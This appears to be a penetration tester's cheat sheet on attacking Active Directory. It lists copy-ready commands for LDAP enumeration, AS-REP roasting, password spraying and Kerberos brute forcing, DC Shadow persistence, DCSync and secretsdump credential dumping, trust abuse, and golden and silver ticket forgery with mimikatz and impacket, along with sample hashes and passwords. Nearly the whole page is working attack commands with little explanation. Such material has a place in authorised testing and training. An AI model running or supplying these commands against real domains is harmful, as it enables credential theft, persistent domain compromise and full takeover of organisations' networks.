AD Related

Enumeration

Basic ldap enumeration

python3 /opt/enum4linux-ng/enum4linux-ng.py -A 1.3.3.7 -p Password123-u morph3
python windapsearch.py -u morph3 -p morph3 -d evil.corp --dc-ip 192.168.1.2
python ad-ldap-enum.py -d contoso.com -l 10.0.0.1 -u Administrator -p P@ssw0rd

LDAP Queries

Get all the users

Get-ADUser -LDAPFilter "(objectClass=user)"

Dump ldap fully

export LDAPTLS_REQCERT=never
ldapsearch -LLL -x -H ldaps://dc.foobar.local -b 'dc=foobar,dc=local' -s sub '(objectclass=*)' -D 'test@foobar.local' -w foobar

AS-Rep Roasting

If a user has pre auth enabled, you grab his/her hash

impacket-GetNPUsers ecorp.local/ -format hashcat -usersfile ./users -dc-ip 10.3.3.7

Bruteforcing - Password Spraying

Import-Module .\DomainPasswordSpray.ps1
Invoke-DomainPasswordSpray -UserList users.txt -Domain domain-name -PasswordList passlist.txt -OutFile sprayed-creds.txt

Kerbrute

Kerberos(port 88) bruteforcing

# Password brute
./kerbrute_linux_amd64 bruteuser -d evil.corp --dc 192.168.1.2 rockyou.txt morph3

# Username brute
./kerbrute_linux_amd64 userenum -d evil.corp --dc 192.168.1.2 users.txt

# Password spray
./kerbrute_linux_amd64 passwordspray -d evil.corp --dc 192.168.1.2 users.txt rockyou.txt

DC Shadow

-This is a persistence attack-

DC Shadow attack aims to inject malicious Domain Controlllers into AD infrastructure so that we can dump actual AD members.

Find sid for that user

wmic useraccount where (name='administrator' and domain='%userdomain%') get name,sid

This will create a RPC Server and listen

lsadump::dcshadow /object:"CN=morph3,OU=Business,OU=Users,OU=ECORP,DC=ECORP,DC=local" /attribute:sidhistory /value:sid

Run this from another mimikatz

lsadump::dcshadow /push

After this, unregistration must be done. Relogin now and perform DCSync

lsadump::dcsync /domain:ECORP.local /account:krbtgt

DC Sync

Using mimikatz,

lsadump::dcsync /domain:domain /all /csv
lsadump::dcsync /user:krbtgt

Using DCSync.ps1,

https://gist.github.com/monoxgas/9d238accd969550136db
powershell.exe -c "Import-Module .\Invoke-DCSync.ps1; Invoke-DCSync -PWDumpFormat"

Using secretdumps module from impacket,

python secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:0f49aab58dd8fb314e268c4c6a65dfc9 -just-dc PENTESTLAB/dc\$@10.0.0.1
python secretsdump.py -system /tmp/SYSTEM -ntds /tmp/ntds.dit LOCAL
impacket-secretsdump morph3@10.11.1.75

Domain Trust

get-domaintrustmapping

We get current domain or target domain sid using Get-DomainSID

kerberos::golden /user:Administrator /domain:<curr_domain> /sid:<curr_domain_sid> /krbtgt:<curr_domain_krbtgt_hash> /sids:<target_domain_sid> /ptt

Golden Ticket

Use krbtgt's hash and you can forge tickets for anyone.

Get krbtgt hash,

lsadump::dcsync /all /csv

You might want to patch it

lsadump::lsa /patch
lsadump::trust /patch

Forging the ticket

  • /rc4 or /krbtgt -> krbtgt hash

  • /sid -> Get-DomainSID

  • /ticket -> this parameter is optional but default is ticket.kirbi

  • /groups -> this parameter is optional but default is 513,512,520,518,519

  • /ptt -> switch to perform ptt

kerberos::golden /user:morph3 /domain:evil.corp /sid:domains-sid /krbtgt:krbtgt-hash /ticket:ticket.kirbi /groups:501,502,513,512,520,518,519 
kerberos::ptt ticket.kirbi

After this, your final ticket should be ready. You can also verify by using the following command that it is in your cache.

klist

You can now verify it is working.

dir \\DC\C$
psexec.exe \\DC cmd.exe

purge it

kerberos::purge 

If you want to use metasploit

post/windows/escalate/golden_ticket 

Silver Ticket

Service accounts

ticketer,

python3 /opt/impacket/examples/ticketer.py -domain scrm.local -user sqlsvc -password Pegasus60 -domain-sid S-1-5-21-2743207045-1827831105-2542523200 ksimpson -spn MSSQLSvc/dc1.scrm.local -nthash B999A16500B87D17EC7F2E2A68778F05

Last updated